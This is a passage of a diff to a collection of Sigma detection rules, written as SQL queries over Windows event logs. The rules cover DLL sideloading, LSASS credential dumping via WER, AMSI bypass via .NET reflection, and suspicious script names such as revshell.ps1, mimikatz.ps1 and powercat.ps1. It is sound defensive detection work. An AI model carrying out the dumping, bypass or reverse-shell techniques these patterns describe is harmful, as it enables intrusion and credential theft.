(x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_schtasks_system.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Suspicious OfflineScannerShell.exe Execution From Another Folder", + "id": "02b18447-ea83-4b1b-8805-714a8a34546a", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Use OfflineScannerShell.exe to execute mpclient.dll library in the current working directory", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\OfflineScannerShell.exe' ESCAPE '\\' AND NOT ((CurrentDirectory LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\Offline\\\\' ESCAPE '\\') OR (CurrentDirectory = '')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_lolbin_offlinescannershell.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Credential Dumping Via WER", + "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", + "author": "@pbssubhash , Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Windows Error Reporting might produce similar behavior. In that case, check the PID associated with the \"-p\" parameter in the CommandLine." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Logon Scripts (UserInitMprLogonScript)", + "id": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1037.001", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Exclude legitimate logon scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%UserInitMprLogonScript%' ESCAPE '\\' OR (ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%netlogon%.bat%' ESCAPE '\\' OR CommandLine LIKE '%UsrLogon.cmd%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\proquota.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "title": "Wusa Extracting Cab Files", + "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "Suspicious WSMAN Provider Image Loads", - "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", - "status": "experimental", - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_wsman_provider_image_load.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "Fsutil Behavior Set SymlinkEvaluation", + "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "UIPromptForCredentials DLLs", - "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "title": "Browser Started with Remote Debugging", + "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", "status": "experimental", - "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.t1185" ], "falsepositives": [ - "Other legitimate processes loading those DLLs in your environment." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" ], - "filename": "image_load_uipromptforcreds_dlls.yml" + "filename": "proc_creation_win_browsers_remote_debugging.yml" }, { - "title": "Potential Antivirus Software DLL Sideloading", - "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "status": "test", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_antivirus.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", + "title": "Add New Download Source To Winget", + "id": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of winget to add new additional download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Other DLLs with the same Imphash" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = 